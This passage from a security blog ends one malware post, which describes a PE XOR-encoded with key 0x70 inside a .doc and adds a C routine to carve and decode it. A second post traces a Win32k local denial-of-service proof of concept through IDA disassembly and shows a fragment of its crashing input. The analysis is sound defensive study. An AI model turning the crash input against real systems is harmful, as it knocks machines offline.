<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">One final detail about the .doc file: as usual, an exe file is appended at the end of the OLE; this one is a PE encrypted with a byte-by-byte XOR using 0x70 as the key (bytes that are 0 or 0x70 are not encrypted).</span></div>
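For analysts who want to pull that appended executable out of the container for inspection, here is an added C example (my own code, not from the original post or any of the tools mentioned). It implements the byte rule described above (XOR with 0x70, leaving 0x00 and 0x70 bytes alone), which happens to be its own inverse, and carves the payload by scanning for a position that decodes to "MZ" with an e_lfanew field pointing at a decoded "PE\0\0". The 512-byte OLE-like prefix and the minimal PE stub are constructed sample data, not bytes from the malware.

```c
/* Added example (not from the original post): carving and decoding a PE
 * appended to an OLE container and XOR-encoded with key 0x70, where bytes
 * equal to 0x00 or 0x70 are left untouched. The sample buffer is
 * constructed here for illustration; it is not data from the malware. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define XOR_KEY 0x70u

/* One byte of the scheme: XOR with the key unless the byte is 0x00 or the
 * key itself. The rule is its own inverse, so it serves both directions. */
uint8_t decode_byte(uint8_t b, uint8_t key)
{
    return (b == 0x00 || b == key) ? b : (uint8_t)(b ^ key);
}

/* Applies decode_byte() in place over a buffer. */
void xor_skip_inplace(uint8_t *buf, size_t len, uint8_t key)
{
    for (size_t i = 0; i < len; i++)
        buf[i] = decode_byte(buf[i], key);
}

/* Reads a little-endian uint32 through the decoder without touching buf. */
static uint32_t decoded_le32(const uint8_t *p, uint8_t key)
{
    return (uint32_t)decode_byte(p[0], key)
         | (uint32_t)decode_byte(p[1], key) << 8
         | (uint32_t)decode_byte(p[2], key) << 16
         | (uint32_t)decode_byte(p[3], key) << 24;
}

/* Scans for an encoded PE: a position qualifies when it decodes to "MZ" and
 * the e_lfanew field (offset 0x3C) points inside the buffer to a decoded
 * "PE\0\0". Returns the offset, or -1 if nothing matches. */
long find_encoded_pe(const uint8_t *buf, size_t len, uint8_t key)
{
    for (size_t i = 0; i + 0x40 <= len; i++) {
        if (decode_byte(buf[i], key) != 'M' || decode_byte(buf[i + 1], key) != 'Z')
            continue;
        uint32_t e_lfanew = decoded_le32(buf + i + 0x3C, key);
        if (e_lfanew > len - i || len - i - e_lfanew < 4)
            continue;
        const uint8_t *pe = buf + i + e_lfanew;
        if (decode_byte(pe[0], key) == 'P' && decode_byte(pe[1], key) == 'E' &&
            decode_byte(pe[2], key) == 0 && decode_byte(pe[3], key) == 0)
            return (long)i;
    }
    return -1;
}

/* Constructed sample: a 512-byte OLE-like header (magic plus zero padding)
 * followed by a minimal encoded PE stub. Returns the number of bytes written. */
size_t build_sample(uint8_t *out, size_t cap)
{
    static const uint8_t ole_magic[8] = {0xD0, 0xCF, 0x11, 0xE0, 0xA1, 0xB1, 0x1A, 0xE1};
    uint8_t stub[0x48] = {0};
    stub[0] = 'M'; stub[1] = 'Z';
    stub[0x3C] = 0x40;                     /* e_lfanew = 0x40 */
    stub[0x40] = 'P'; stub[0x41] = 'E';    /* "PE\0\0" */
    if (cap < 512 + sizeof stub)
        return 0;
    memset(out, 0, 512);
    memcpy(out, ole_magic, sizeof ole_magic);
    xor_skip_inplace(stub, sizeof stub, XOR_KEY); /* encode with the same rule */
    memcpy(out + 512, stub, sizeof stub);
    return 512 + sizeof stub;
}

/* Runs the carving on the constructed sample and returns the offset found. */
long demo_offset(void)
{
    uint8_t buf[1024];
    size_t n = build_sample(buf, sizeof buf);
    return find_encoded_pe(buf, n, XOR_KEY);
}

/* Decodes the carved payload and returns 1 if it reads as a PE. */
int demo_decoded_ok(void)
{
    uint8_t buf[1024];
    size_t n = build_sample(buf, sizeof buf);
    long off = find_encoded_pe(buf, n, XOR_KEY);
    if (off < 0)
        return 0;
    xor_skip_inplace(buf + off, n - (size_t)off, XOR_KEY);
    return buf[off] == 'M' && buf[off + 1] == 'Z' &&
           buf[off + 0x40] == 'P' && buf[off + 0x41] == 'E';
}

int main(void)
{
    printf("encoded PE found at offset %ld, decoded ok: %d\n", demo_offset(), demo_decoded_ok());
    return 0;
}
```

The "MZ plus e_lfanew plus PE" check is a heuristic: it avoids false hits on stray 0x3D 0x2A pairs inside the document body, but a real-world carver should additionally sanity-check the decoded PE (section table, sizes) before trusting the offset.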
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-73522440843812157732012-05-05T17:18:00.000-07:002012-05-06T11:36:06.159-07:00Analysis of a Microsoft Windows Kernel "Win32k.sys" Local Denial of Service Vulnerability<br />
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">A couple of days ago, a <a href="http://www.securityfocus.com/bid/53343/">Microsoft Windows Kernel "Win32k.sys" Local Denial of Service Vulnerability</a> (BID: 53343) was published on the exploit-db website: follow <a href="http://www.exploit-db.com/exploits/18819/">this link</a> to get the PoC code.</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">As I wanted to investigate this vulnerability, I compiled the code in Visual Studio and built the executable.</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Then I ran it on a dedicated virtual machine, and…</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 14.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcXghWISn1-2PTwmH-AgbFOikHaVBPj0b0P3CbNCdB7ypFgSUYaFpl3xnt1hoRmR0q0P7RtpzIMj3rAbbgtnrXG-mgS2p_WvcMaH6zwb0qCrvxfeFFEKvXDX1NDsHdnvCHww3x-Wk4evI/s1600/dest.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcXghWISn1-2PTwmH-AgbFOikHaVBPj0b0P3CbNCdB7ypFgSUYaFpl3xnt1hoRmR0q0P7RtpzIMj3rAbbgtnrXG-mgS2p_WvcMaH6zwb0qCrvxfeFFEKvXDX1NDsHdnvCHww3x-Wk4evI/s1600/dest.png" /></a></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 14.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Yeah… I got the dreaded Blue Screen Of Death! So… it worked :P</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This screen gives us useful information; we can read: "PAGE_FAULT_IN_NONPAGED_AREA" and then "STOP: 0x00000050 (0xFF7C98CC, 0x00000000, 0x805D33A5, 0x00000000)".</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Now, if we read the <a href="http://msdn.microsoft.com/en-us/library/windows/hardware/ff559023(v=vs.85).aspx">documentation</a> we get "Bug Check 0x50: </span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">PAGE_FAULT_IN_NONPAGED_AREA</span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">". But, w</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">hat does that mean?</span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> Well, in the Windows Kernel, the memory is divided into two kinds: paged memory and nonpaged memory.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Basically, the difference is that the former can be swapped to disk while the latter can't. </span><span class="Apple-style-span" style="color: #1e1e1e; line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, the error means that the kernel referenced an invalid memory location within the area reserved for nonpaged memory.</span></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"><br /></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">The parameters of the bug check stand respectively for: the memory address being referenced (0xFF7C98CC); the operation type (0 here means a read operation); the address of the instruction that referenced the memory (0x805D33A5, where the crash happened); and a reserved value (not set).</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">I opened ntkrnlpa.exe with IDA, I loaded the debug symbols and searched for the address that caused the crash, getting this:</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="color: #1e1e1e; line-height: 20px;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC3A5 cmp word ptr [ecx], 23h</span></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">This means that ecx contains an invalid pointer.</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Also, IDA tells us that we are inside the function:</span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC370 ; int __stdcall RtlpGetIntegerAtom(ULONG CrashPointer,int)</span></span></span></span></div>
<div style="font-style: normal; font-variant: normal; font-weight: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: #1e1e1e; font-family: 'Courier New', Courier, monospace;"><span style="line-height: 20px;"> </span></span></div>
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<div style="font-family: Helvetica; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Then, analyzing the code of the function:</span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span" style="line-height: 20px;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span></span></span></span></div>
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC372 push ebp</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC373 mov ebp, esp</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC375 push ecx</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC376 push ecx</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC377 mov ecx, [ebp+CrashPointer]</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC37A test ecx, 0FFFF0000h</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC380 jnz short Crash_Dead</span></span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="font-family: 'Courier New', Courier, monospace; line-height: 20px;">...</span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="font-family: 'Courier New', Courier, monospace; line-height: 20px;">PAGE:004FC3A5 Crash_Dead:</span></span></span></span><br />
<span class="Apple-style-span" style="color: #1e1e1e;"><span class="Apple-style-span"><span class="Apple-style-span" style="font-size: small;"><span style="line-height: 20px;"><span style="font-family: 'Courier New', Courier, monospace;">PAGE:004FC3A5 cmp word ptr [ecx], 23h</span></span></span></span></span><br />
<br />
<div style="font-family: Helvetica; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<br /></div>
</div>
<div style="color: #1e1e1e; font-family: 'Courier New'; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 18px;">
<span style="font-family: Verdana, sans-serif; font-size: small; line-height: normal;">we see that the invalid pointer is the first parameter of the function, and it is accessed without being properly validated.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;">Moreover, the memory location being accessed is the same one that is passed in from the user-mode PoC code:</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif; font-size: small;"> </span></div>
<span class="Apple-style-span">
</span><br />
<span class="Apple-style-span"><div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">UINT c[]={ </span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">0x00000000,0x28001500,<span class="Apple-style-span" style="color: purple;"><b>0xff7c98cc</b></span>,0x23ffffff</span></span></div>
<div style="color: #1e1e1e; font-family: Verdana;">
<br /></div>
<div style="font-family: Verdana;">
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Thus the pointer coming from user mode reaches this dereference without being validated or modified in any way.</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">From the cross-references we see that the previous function is called by these two functions:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RtlAddAtomToAtomTable(x,x,x)</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">RtlLookupAtomInAtomTable(x,x,x)</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Neither of these functions validates the pointer either. We can see this in the code of the second one:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC692 push 18h</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC694 push offset dword_4031A0</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC699 call __SEH_prolog</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC69E push [ebp+arg_0]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6A1 call _RtlpLockAtomTable@4;</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6A6 test al, al</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6A8 jnz short loc_4FC6B4</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6AA mov eax, 0C000000Dh</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6AF jmp loc_4FC76C</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6B4 xor edi, edi</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6B6 mov [ebp+ms_exc.disabled], edi</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6B9 lea eax, [ebp+var_20]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;">PAGE:004FC6BC push eax ; int</span></span></div>
<div style="font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: purple;">PAGE:004FC6BD mov esi, [ebp+PointerCrash]</span></span></span></div>
<div style="font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: purple;">PAGE:004FC6C0 push esi ; CrashPointer</span></span></span></div>
<div style="font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: purple;">PAGE:004FC6C1 call _RtlpGetIntegerAtom@8 ;</span></span><span class="Apple-style-span" style="color: #cc0000; font-size: small;"> </span></span></div>
<div style="font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">This function is the one used in the exploit.</span></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Again, from the cross-references we find that this function is called by NtFindAtom, which does perform proper validation: the usual probe that checks that the buffer does not wrap around and that it ends at or below MmUserProbeAddress, raising an access violation otherwise:</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 15px;">
<br /></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B81 mov ecx, [ebp+CopyOfCrashPointer]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B87 lea eax, [ecx+ebx]</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">PAGE:00535B8A cmp eax, ecx</span></span></div>
<div style="color: #1e1e1e; font-family: 'Helvetica Neue'; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; line-height: 20px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
